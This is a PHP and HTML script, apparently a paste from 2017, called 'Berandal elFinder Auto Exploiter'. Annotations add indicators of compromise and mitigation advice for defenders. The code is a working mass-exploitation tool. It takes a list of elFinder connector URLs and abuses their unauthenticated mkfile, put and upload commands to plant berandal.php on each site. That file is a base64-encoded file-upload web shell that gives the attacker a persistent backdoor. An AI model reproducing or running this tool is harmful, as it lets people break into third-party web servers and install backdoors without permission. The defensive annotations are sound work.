isname

Berandal

Jan 20th, 2017
  <!-- Reviewer annotation: operator-facing form of the script. The textarea
       takes a list of elFinder connector URLs, one per line, and the form
       (no action attribute) posts them back to this same page, where the PHP
       further down processes them. Nothing here authenticates the operator,
       so anyone who can reach the page can drive it. -->
  1. <html>
  2.  
  3.  
  4.  
  5. <title>Berandal</title>
  6.  
  7. <style type="text/css">
  8.  
  9. html {
  10.  
  11. text-align: center;
  12.  
  13. }
  14.  
  15. a {
  16.  
  17. text-decoration: none;
  18.  
  19. color: black;
  20.  
  21. }
  22.  
  23. </style>
  24.  
  25.  
  26.  
  27. Nitip nick cok!<br>
  28.  
  29. <h1>Berandal elFinder Auto Exploiter</h1>
  30.  
  31. <form method="post">
  32.  
  33. Target: <br>
  34.  
  35. <textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize:
  36. none;"></textarea><br>
  37.  
  38. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="SIKAT!">
  39.  
  40. </form>
  41.  
  42. </html>
  43.  
  44. <?php
  45.  
  46. # Berandal
  47.  
  # ngirim($url, $isi): send an HTTP POST to $url with $isi as the request body
  # and return whatever curl_exec() yields (the response body, because
  # CURLOPT_RETURNTRANSFER is on, or false on failure; the caller is not told
  # which). The cURL handle is never closed.
  #
  # Reviewer notes, defensive reading:
  #  - Peer and host certificate verification are both switched off, so the
  #    request goes through regardless of the certificate the endpoint presents.
  #  - The User-Agent is a fixed Firefox 32 / Windows NT 6.1 string. Requests sent
  #    through this helper should carry it verbatim, which makes it a usable
  #    (if easily changed) log indicator on the receiving side.
  #  - Cookies are read from and written to a file named 'coker_log' relative to
  #    the working directory; its presence on a host suggests this script ran there.
  48. function ngirim($url, $isi) {
  49.  
  50. $ch = curl_init ("$url");
  51.  
  52. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  53.  
  54. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  55.  
  56. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  57.  
  # TLS verification disabled (both peer certificate and host name checks).
  58. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  59.  
  60. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  61.  
  62. curl_setopt ($ch, CURLOPT_POST, 1);
  63.  
  64. curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  65.  
  # Same file is used as cookie jar and cookie source, so a session persists across calls.
  66. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  67.  
  68. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  69.  
  70. $data3 = curl_exec ($ch);
  71.  
  72. return $data3;
  73.  
  74. }
  75.  
  # Main loop. Reviewer annotation, defensive reading.
  #
  # For every URL submitted through the form, the script tries to place a file
  # named berandal.php on the remote elFinder instance through its connector:
  # a GET with cmd=mkfile, then a POST with cmd=put carrying the file content,
  # and, if the response does not mention the file name, a POST to ?cmd=upload.
  # All of this relies on the connector accepting these commands from an
  # unauthenticated client and on the storage directory executing PHP.
  #
  # Indicators a defender can search for, all taken from the literals below:
  #  - connector requests with cmd=mkfile, name=berandal.php and target=l1_Lw
  #  - POSTs with cmd=put, or to ?cmd=upload, bearing the User-Agent set in ngirim()
  #  - a file called berandal.php inside the elFinder files directory
  #
  # Mitigation on the elFinder side: keep the connector behind authentication
  # (the accessControl callback and the application's own session check),
  # restrict upload types with uploadOrder / uploadAllow / uploadDeny, switch off
  # commands that are not needed through the disabled option, and configure the
  # web server so that nothing under the files directory is executed as script.
  76. $target = explode("\r\n", $_POST['target']);
  77.  
  78. if($_POST['x']) {
  79.  
  80. foreach($target as $korban) {
  81.  
  82. $nama_doang = "berandal.php";
  83.  
  # Base64 blob. It decodes to a short PHP page that shows a file-upload form and
  # copies whatever file is posted to it into its own directory, with no
  # authentication: a second-stage uploader. It prints "berhasil" or "gagal"
  # depending on the copy result, strings that can serve as content signatures.
  84. $isi_nama_doang =
  85. "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1
  86. lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV
  87. 0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  88.  
  89. $decode_isi = base64_decode($isi_nama_doang);
  90.  
  # Base64 of the file name, used below to build the "l1_..." target identifier.
  91. $encode = base64_encode($nama_doang);
  92.  
  # The decoded payload is also written next to this script on the operator's
  # host, so berandal.php appears there too. The handle is never closed.
  93. $fp = fopen($nama_doang,"w");
  94.  
  95. fputs($fp, $decode_isi);
  96.  
  # The submitted URL is echoed into HTML without escaping.
  97. echo "[!] <a href='$korban' target='_blank'>$korban</a> <br>";
  98.  
  99. echo "# Upload[1] ......<br>";
  100.  
  # "Lw" is base64 for "/", so target=l1_Lw presumably addresses the root of the
  # connector's first volume. The response ($b) is never inspected.
  101. $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  102.  
  103. $b = file_get_contents("$url_mkfile");
  104.  
  105. $post1 = array(
  106.  
  107. "cmd" => "put",
  108.  
  109. "target" => "l1_$encode",
  110.  
  111. "content" => "$decode_isi",
  112.  
  113. );
  114.  
  115. $post2 = array(
  116.  
  # Opaque hash copied verbatim; what it identifies is not evident from this page.
  117. "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  118.  
  119. "upload[]" => "@$nama_doang",);
  120.  
  121. $output_mkfile = ngirim("$korban", $post1);
  122.  
  # "Success" only means the file name occurs somewhere in the response body
  # (the "." in the pattern is an unescaped wildcard). It does not show that the
  # file was stored or that the server would execute it.
  123. if(preg_match("/$nama_doang/", $output_mkfile)) {
  124.  
  125. echo "# Upload Sukses 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  126.  
  127. } else {
  128.  
  129. echo "# Upload Gagal Cok! 1 <br># Uploading 2..<br>";
  130.  
  # Fallback path: multipart upload through the connector's upload command.
  131. $upload_ah = ngirim("$korban?cmd=upload", $post2);
  132.  
  133. if(preg_match("/$nama_doang/", $upload_ah)) {
  134.  
  135. echo "# Upload Sukses 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  136.  
  137. } else {
  138.  
  139. echo "# Upload Gagal Lagi Cok! 2<br><br>";
  140.  
  141. }
  142.  
  143. }
  144.  
  145. }
  146.  
  147. }
  148.  
  149. ?>